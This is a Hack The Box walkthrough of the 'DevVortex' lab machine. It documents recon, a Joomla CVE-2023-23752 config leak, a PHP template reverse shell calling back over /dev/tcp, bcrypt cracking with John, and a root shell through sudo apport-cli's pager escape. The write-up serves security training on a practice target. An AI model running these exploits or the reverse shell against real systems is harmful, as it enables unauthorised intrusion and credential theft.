[Hack The Box Write-Up: DevVortex] - [Easy]
Reconnaissance and Initial Steps
Copy link
The journey began with an nmap scan:
# Nmap 7.94 scan initiated Wed Dec 6 12:30:49 2023 as: nmap -v -sC -sV -oN nmap/10.10.11.242 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 6 12:32:05 2023 -- 1 IP address (1 host up) scanned in 75.89 secondsKey findings:
- SSH (Port 22): OpenSSH 8.2p1 on Ubuntu.
- HTTP (Port 80): Nginx 1.18.0 on Ubuntu, redirecting to http://devvortex.htb/.
The IP address and domain were added to /etc/hosts:
echo "10.10.14.242 devvortex.htb" | sudo tee -a /etc/hostsInitial Foothold
Copy link
Exploration of devvortex.htb was initially unfruitful.
The first significant step was directory enumeration using Gobuster:
gobuster dir -u http://devvortex.htb/ -w $wordlists/content/dirs-and-files-medium.txt -t 50
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /Users/mekaneo/Hacking/wordlists/content/dirs-and-files-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/12/08 17:32:43 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 178] [--> http://devvortex.htb/images/]
/css (Status: 301) [Size: 178] [--> http://devvortex.htb/css/]
/js (Status: 301) [Size: 178] [--> http://devvortex.htb/js/]
===============================================================
2023/12/08 17:32:51 Finished
===============================================================Nothing interesing found. DNS subdomain enumeration revealed dev.devvortex.htb:
gobuster dns -d devvortex.htb -w $wordlists/dns/subdomains-top1million-20000.txt -t 20
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: devvortex.htb
[+] Threads: 20
[+] Timeout: 1s
[+] Wordlist: /Users/mekaneo/Hacking/wordlists/dns/subdomains-top1million-20000.txt
===============================================================
2023/12/08 17:37:57 Starting gobuster in DNS enumeration mode
===============================================================
Found: dev.devvortex.htb
Progress: 1013 / 19967 (5.07%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/12/08 17:38:02 Finished
===============================================================Found: dev.devvortex.htb
Copy link
I've added it to my /etc/hosts and proceeded to explore this website. Hitting /robots.txt revealed it's content and it became clear: this is a Joomla CMS.
Attempts with common credentials on the Joomla login page were unsuccessful.
CVE-2023-23752 to code execution
Copy link
From VulnCheck:
On February 16, 2023, Joomla! published a security advisory for CVE-2023-23752. The advisory describes an “improper access check” affecting Joomla! 4.0.0 through 4.2.7. The following day, a chinese-language blog shared the technical details of the vulnerability. The blog describes an authentication bypass that allows an attacker to leak privileged information.Leveraging CVE-2023-23752 in Joomla:
Request
Copy link
curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq .Response
Copy link
{
...
{
"type": "application",
"id": "224",
"attributes": {
"dbtype": "mysqli",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"host": "localhost",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"user": "lewis",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"password": "P4ntherg0t1n5r3c0n##",
"id": 224
}
},
...
}First thing I tried, is to SSH into the server with those, but my attempt failed. After all, these credentials enabled Joomla Administrator dashboard access:
From here, I knew, executing PHP code is easy and requires template editing. I went to System->Templates->Administrator Templates->index.php
PHP reverse shell execution through template editing:
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'");Establishing a connection using netcat:
nc -l 4444
Stabilizing the shell:
script /dev/null -c /bin/bash
CTRL + Z
stty raw -echo; fg
Then press Enter twice, and then enter:
export TERM=xtermNow, I had a properly working shell, but my current user couldn't read the user flag:
www-data@devvortex:~/dev.devvortex.htb/administrator$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Privilege Escalation "www-data" -> "rogan"
Copy link
Knowing that the credentials obtained from exploiting the Joomla information leak vulnerability were for MySQL, I proceeded to connect to MySQL to explore the users' table:
www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 26575
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)
mysql> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select username,password from sd4fg_users;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| lewis | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan | $2y$10$IT4k5k--------------------------------------/yBtkIj12 |
+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)In the users' table, I found another user, logan, with a BCrypt hashed password. To crack this hash, I created a file named hash.txt, placed the hash inside, and initiated the attack using John the Ripper:
john --format=bcrypt --wordlist=$wordlists/passwords/rockyou.txt hash.txt
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 0% 0g/s 52.88p/s 52.88c/s 52.88C/s billabong..froggy
teq-------cho (?)
1g 0:00:00:26 100% 0.03763g/s 52.84p/s 52.84c/s 52.84C/s leelee..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completedThe password was cracked in less than 20 seconds: teq-------cho.
I then SSHed into the box using these new credentials:
cat users.txt
bbb1****************ef4aPrivilege Escalation "rogan" -> "root"
Copy link
The first thing I did as a user was to list logan's sudo privileges:
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cliI could run /usr/bin/apport-cliwith sudo, but needed to figure out how to exploit it. Quick research revealed a CVE:
A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.This was exactly my case, so I started exploring.
logan@devvortex:~$ sudo /usr/bin/apport-cli
No pending crash reports. Try --help for more information.
logan@devvortex:~$ sudo /usr/bin/apport-cli --help
Usage: apport-cli [options] [symptom|pid|package|program path|.apport/.crash file]
Options:
-h, --help show this help message and exit
-f, --file-bug Start in bug filing mode. Requires --package and an
optional --pid, or just a --pid. If neither is given,
display a list of known symptoms. (Implied if a single
argument is given.)
-w, --window Click a window as a target for filing a problem
report.
-u UPDATE_REPORT, --update-bug=UPDATE_REPORT
Start in bug updating mode. Can take an optional
--package.
-s SYMPTOM, --symptom=SYMPTOM
File a bug report about a symptom. (Implied if symptom
name is given as only argument.)
-p PACKAGE, --package=PACKAGE
Specify package name in --file-bug mode. This is
optional if a --pid is specified. (Implied if package
name is given as only argument.)
-P PID, --pid=PID Specify a running program in --file-bug mode. If this
is specified, the bug report will contain more
information. (Implied if pid is given as only
argument.)
--hanging The provided pid is a hanging application.
-c PATH, --crash-file=PATH
Report the crash from given .apport or .crash file
instead of the pending ones in /var/crash. (Implied if
file is given as only argument.)
--save=PATH In bug filing mode, save the collected information
into a file instead of reporting it. This file can
then be reported later on from a different machine.
--tag=TAG Add an extra tag to the report. Can be specified
multiple times.
-v, --version Print the Apport version number.It was clear I could either create crash reports or read any existing ones on the system. Since there were none, I decided to create my own report:
logan@devvortex:~$ sudo /usr/bin/apport-cli -f
*** What kind of problem do you want to report?
Choices:
1: Display (X.org)
2: External or internal storage devices (e. g. USB sticks)
3: Security related problems
4: Sound/audio related problems
5: dist-upgrade
6: installation
7: installer
8: release-upgrade
9: ubuntu-release-upgrader
10: Other problem
C: Cancel
Please choose (1/2/3/4/5/6/7/8/9/10/C): 1
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
*** What display problem do you observe?
Choices:
1: I don't know
2: Freezes or hangs during boot or usage
3: Crashes or restarts back to login screen
4: Resolution is incorrect
5: Shows screen corruption
6: Performance is worse than expected
7: Fonts are the wrong size
8: Other display-related problem
C: Cancel
Please choose (1/2/3/4/5/6/7/8/C): 2
***
To debug X freezes, please see https://wiki.ubuntu.com/X/Troubleshooting/Freeze
Press any key to continue...
..dpkg-query: no packages found matching xorg
.................
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (1.4 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C):By choosing to view the report, a Vi-like editor appeared, and I immediately remembered that by passing the !:command syntax, I could execute code. Since I was running the binary in a privileged context, I could gain root access by executing !/bin/bash:
I successfully gained root access and accessed the root.txt file:
What would you like to do? Your options are:
S: Send report (1.4 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# id
uid=0(root) gid=0(root) groups=0(root)
root@devvortex:/home/logan# cat ~/root.txt
37c6************************0d3aConclusion
Copy link
The DevVortex box presented a challenging and educational experience, highlighting the importance of meticulous reconnaissance, vulnerability exploitation, and creative problem-solving in privilege escalation. This journey from an initial nmap scan to obtaining root access underscores the complexities and excitement inherent in penetration testing and cybersecurity exploration.